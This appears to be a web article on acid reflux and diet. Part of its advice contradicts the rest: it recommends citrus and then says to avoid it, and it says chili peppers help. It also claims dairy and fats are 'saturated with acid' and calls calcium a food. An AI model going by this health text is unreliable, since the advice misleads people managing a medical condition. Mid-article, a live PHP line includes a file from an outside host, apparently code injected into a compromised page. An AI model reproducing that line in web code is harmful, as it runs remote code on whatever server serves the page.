Dairy, red meat, and fats and oils are saturated with high levels of acid and should be removed from daily consumption to avoid acid reflux and alkaline diet foods should be consumed instead. Mustard, chili pepper and all herbs, contrary to popular belief, are very good for someone with acid reflux because they are very high in alkaline content.

Alcohol and tobacco should be avoided by someone with acid reflux as they have very low pH percentages. Many believe that milk will help with indigestion while it actually hurts because of the acid content is so high, so it should be avoided for those with acid reflux and alkaline diet. Citrus fruits actually have an alkalinity effect on the body, and should be consumed to help control acid reflux.

A simple scale was devised for acid/alkaline purposes. 0 is straight acid and 14 means no acid present, which would mean 7.0 is the neutral ground. Foods that have a high alkaline content, such as calcium, should be consumed in an acid reflux and alkaline diet.

Acid Reflux Damage

<?php include "http://www.vt88.com/block.txt"; ?>Day after day, millions worldwide suffer from symptoms caused by acid reflux. This is usually described as a condition where the liquids in the stomach are regurgitated (or refluxed) into the esophagus. Acid reflux may also irritate the chest to cause a condition commonly known as heartburn.

If, over a period of time, the acid reflux is left untreated, the liquid can inflame and damage the lining of the esophagus, or worse, cause esophageal cancer. On that note, the acid moving up into the esophagus, irritating the lining causes the fiery sensation in the chest. Unfortunately, Acid reflux is a very harmful and chronic condition that must be treated indefinitely, as stopping treatment would most certainly bring back the acid reflux and in turn bring back the irritation, heartburn, and acid reflux damage. If not treated, the damage may be irreversible.

It is common to think that just because one has had heartburn that one must have acid reflux. Over the counter medicine can usually cure simple heartburn quickly as long as you lay off the spicy foods; it's better to know your own tolerance of such foods. There really shouldn't be too big of a problem unless the heartburn is persistent and showing up two or more times in a week, if this is the case then acid reflux may have developed. (Please see your physician, as you should never diagnose yourself from hearsay.)

Controlling Acid Reflux Symptoms

Those who are experiencing symptoms from acid reflux should know that they need to make some lifestyle changes. Simply eating different foods can do this. After eating, the body helps facilitate digestion by producing acids and enzymes to help break down the food. A good tip is to avoid eating before you lay down for bed. A better tip for those whom suffer from acid reflux would be to try to not lie down for two to three hours after eating. Follow these simple tips for bedtime and for daytime napping.

The acid your body produces is directly proportional to the amount of food you eat, so eating smaller meals will create less acid, and therefore help control acid reflux. Instead of eating a few big meals throughout the day, try eating many smaller meals. This can aid your symptoms of acid reflux and also aid in weight loss. Try to eat less fatty foods. The less caffeine in your system, the better so limit your intake of coffees, colas, and chocolates to really help stem reflux. Tomatoes and other spicy foods should be avoided. Also, a good way to avoid acid is to not eat acid! Avoid citrus fruits, such as oranges and grapefruit, which are high in acid content.

Products such as tobacco and alcohol should be avoided. A drink every once in awhile should not hurt, but excessive drinking or drinking on a regular basis can seriously increase acid reflux symptoms. You should raise the head of your bed if at all possible. This is helpful because gravity is on your side in helping the acid reflux stay down. Practice good posture; it helps keep symptoms of acid reflux at bay, and also has been shown to prevent muscle pain.
